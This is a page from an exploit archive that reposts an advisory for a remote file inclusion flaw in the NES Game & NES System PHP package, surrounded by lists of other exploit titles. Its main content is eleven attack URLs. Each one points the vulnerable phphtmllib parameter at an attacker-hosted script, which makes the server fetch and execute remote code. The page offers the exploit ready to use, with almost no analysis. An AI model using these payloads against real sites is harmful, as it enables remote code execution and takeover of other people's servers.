exploits , vulnerabilities , articles , NES Game and NES System <= c108122 File Include Vulnerabilities

2007-03-08 GaziYapBoz Game Portal (kategori.asp) Remote SQL Injection Vuln
2006-06-09 0verkill 0.16 (ASCII-ART Game) Remote Integer Overflow Crash Exploit
2005-04-24 Yager Game v5.24 Data Block Remote Buffer Overflow Exploit
2004-01-02 Xsok v1.02 "-xsokdir" local buffer overflow game exploit
2003-08-01 xtokkaetama 1.0b local game exploit on Red Hat 9.0

2006-08-20

NES Game and NES System <= c108122 File Include Vulnerabilities

Rated as : High Risk

/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- NES Game & NES System <= c108122 (phphtmllib) Remote File Include
Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: NES Game & NES System v. c108122
- [Script site: http://sourceforge.net/projects/nesgame
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-          http://www.devilteam.yum.pl/
-                       and
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*

a lot of include vulnerability .....

*/
#Exploit:

http://www.site.com/[NES_path]/phphtmllib/includes.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/divtag_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/form_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/html_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/FooterNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/HTMLPageClass.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/InfoTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/NavTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/TextNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]


securitydot.net - 2006-08-20

Exploits - newest 10 RSS | More

2007-06-15 38587 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20177 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 24024 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20119 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12396 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10545 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12766 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10610 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22794 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11105 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit